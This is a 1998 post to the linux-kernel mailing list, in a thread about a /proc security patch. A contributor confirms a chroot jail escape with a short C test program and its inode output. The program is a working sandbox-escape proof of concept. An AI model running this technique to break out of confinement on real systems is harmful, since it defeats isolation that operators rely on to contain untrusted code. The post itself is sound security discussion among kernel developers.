Re: Security patch for /proc

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Linus Torvalds: "Re: GGI and cli/sti in X"
• Previous message: Lluisma: "PPro for a PII in make config"

> On Thu, 2 Apr 1998, Jeremy Fitzhardinge wrote:
>
> > Robert Bihlmeyer wrote:
> > > Alan Cox wrote:
> > > >> mkdir("x"); chroot("x"); chdir("../../../../../../../..");
> > > >> chroot(".");
> > > You tried it? One will escape from x with that.
> >
> > Well, one was never really captured. I didn't notice the missing chdir,
> > but its well known behaviour that if you never chdir into a chroot jail,
> > you can easily "escape".
>
> You missed the point. You _are_ already in a chroot jail, this is how you
> escape from it.
>
> mkdir("foo"); chroot("foo"); chdir("foo");
>
> # you are in the "jail" now
>
> mkdir("x"); chroot("x"); chdir("../../../../../.."); chroot(".");
>
> # no more jail...

first I thought you're wrong because you missed the `chroot("/")'
after going to jail which I thought was important in this case.

but, testing first before replying I got the following output

/ 2053 2086
/ 2053 2086
/ 2053 2

from the output below which shows the inode number of the real /
so indeed it's possible to escape :-(

-------------------------------------------------------------------------------
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

void main()
{
struct stat buf;

mkdir("jail",0755);
chroot("jail");
chdir("jail");
#ifdef not_really_necessary_but_why_not
chdir("/");
#endif
stat(".",&buf);
printf("%s %d %ld\n",get_current_dir_name(),buf.st_dev,buf.st_ino);

chdir("../../../../../../../../../../..");
chroot(".");
stat(".",&buf);
printf("%s %d %ld\n",get_current_dir_name(),buf.st_dev,buf.st_ino);

/* dig tunnel to escape... */
mkdir("tunnel",0755);
chroot("tunnel");

chdir("../../../../../../../../../../..");
chroot(".");
stat(".",&buf);
printf("%s %d %ld\n",get_current_dir_name(),buf.st_dev,buf.st_ino);

exit(0);
}
-------------------------------------------------------------------------------

Harald

--
All SCSI disks will from now on                     ___       _____
be required to send an email notice                0--,|    /OOOOOOO\
24 hours prior to complete hardware failure!      <_/  /  /OOOOOOOOOOO\
                                                    \  \/OOOOOOOOOOOOOOO\
                                                      \ OOOOOOOOOOOOOOOOO|//
Harald Koenig,                                         \/\/\/\/\/\/\/\/\/
Inst.f.Theoret.Astrophysik                              //  /     \\  \
koenig@tat.physik.uni-tuebingen.de                     ^^^^^       ^^^^^

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu

• Next message: Linus Torvalds: "Re: GGI and cli/sti in X"
• Previous message: Lluisma: "PPro for a PII in make config"